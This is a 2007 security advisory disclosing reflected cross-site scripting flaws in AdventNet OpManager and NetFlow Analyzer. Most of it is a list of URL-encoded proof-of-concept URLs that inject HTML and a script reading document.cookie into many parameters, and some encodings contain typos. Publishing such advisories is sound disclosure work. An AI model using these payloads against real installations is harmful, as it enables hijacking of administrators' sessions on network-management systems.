netflow-xss.txt

2007-07-07T00:00:00
ID PACKETSTORM:57502
Type packetstorm
Reporter Lostmon
Modified 2007-07-07T00:00:00

Description

                                        
                                            `###################################################  
NetFlow Analizer 5 & OpManager 7 multiple XSS  
vendor url:http://www.adventnet.com/  
advisore:http://lostmon.blogspot.com/2007/07/  
netflow-analizer-5-opmanager-7-multiple.html  
vendor notify:yes exploits include:yes  
###################################################  
  
NetFlow Analizer and OpManager contains a flaw that allows  
a remote cross site scripting attack. This flaw exists  
because the application does not validate multiple params  
upon submission to multiple scripts.This could allow a user  
to create a specially crafted URL that would execute  
arbitrary code in a user's browser within the trust  
relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
  
#####################  
Versions afected:  
#####################  
  
OpManager 7  
OpManager 6  
  
NetFlow Analizer 5  
  
other versions can be vulnerables too  
  
  
###################  
Solution:  
###################  
  
No solutions was available at this time !!!  
  
  
  
  
##################  
Time Line  
##################  
  
Discovered:20-05-2007  
vendor notify:02-07-2007  
vendor response:----  
disclosure:4-07-2007  
  
###################  
Examples  
###################  
  
for exploit some flaws you need to login.  
  
  
#####################  
OpManager  
#####################  
  
  
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%F%  
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E62%  
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3  
E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/devices/Search.do?searchTerm=sss%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%F%  
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selectedTab=Map  
  
http://localhost:8080/reports/ReportViewAction.do?selected  
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN  
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E  
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%  
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6  
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20  
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%  
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6  
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69  
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di  
splayName=webclient.reports.servers.memutil  
  
http://localhost:8080/reports/ReportViewAction.do?selectedT  
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam  
e=Utilization_Report&displayName=webclient.reports.servers.  
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F  
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7  
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%  
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21  
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6  
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%  
69%70%74%3E%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/reports/ReportViewAction.do?selectedT  
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%  
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22  
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7  
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%  
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E  
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6  
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%  
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62  
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc  
lient.reports.servers.cpuutil  
  
  
http://localhost:8080/admin/ServiceConfiguration.do?operati  
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7  
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%  
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E  
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2  
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%  
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72  
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2  
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte  
r&serviceName=Alerter  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedNo  
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6  
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%  
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D  
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3  
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%  
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63  
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7  
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa  
me=com.adventnet.me.opmanager.webclient.admin.association.N  
TServiceAssociation  
  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedTa  
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F  
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7  
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%  
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21  
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6  
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%  
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf  
igurations  
  
http://localhost:8080/admin/DeviceAssociation.do?selectedTa  
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F  
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6  
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%  
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73  
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5  
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%  
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E  
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6  
F%64%79%3E  
  
  
#######################  
NetFlow Analizer  
#######################  
  
http://localhost:8080/netflow/jspui/applicationList.jsp?alph  
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68  
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E  
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F  
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C  
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70  
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D  
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E  
%3C%2F%62%6F%64%79%3E  
  
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif  
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7  
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6  
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6  
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2  
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3  
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6  
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3  
C%2F%62%6F%64%79%3E&appID=62  
  
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=  
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%  
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%  
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%  
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%  
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%  
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%  
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%  
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos  
  
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g  
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%  
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%  
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%  
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%  
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%  
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%  
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%  
3E%3C%2F%62%6F%64%79%3E&grDisp=1  
  
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g  
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6  
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E  
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%  
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2  
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E  
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%  
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2  
F%62%6F%64%79%3E  
  
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl  
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%  
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62  
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2  
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%  
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73  
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2  
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%  
64%79%3E&period=hourly&customOption=true&firstTime=true  
  
#################### €nd ################################  
  
Thnx to estrella to be my ligth.  
Thnx to all Lostmon Team !!!  
  
--  
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
  
--  
La curiosidad es lo que hace mover la mente....  
`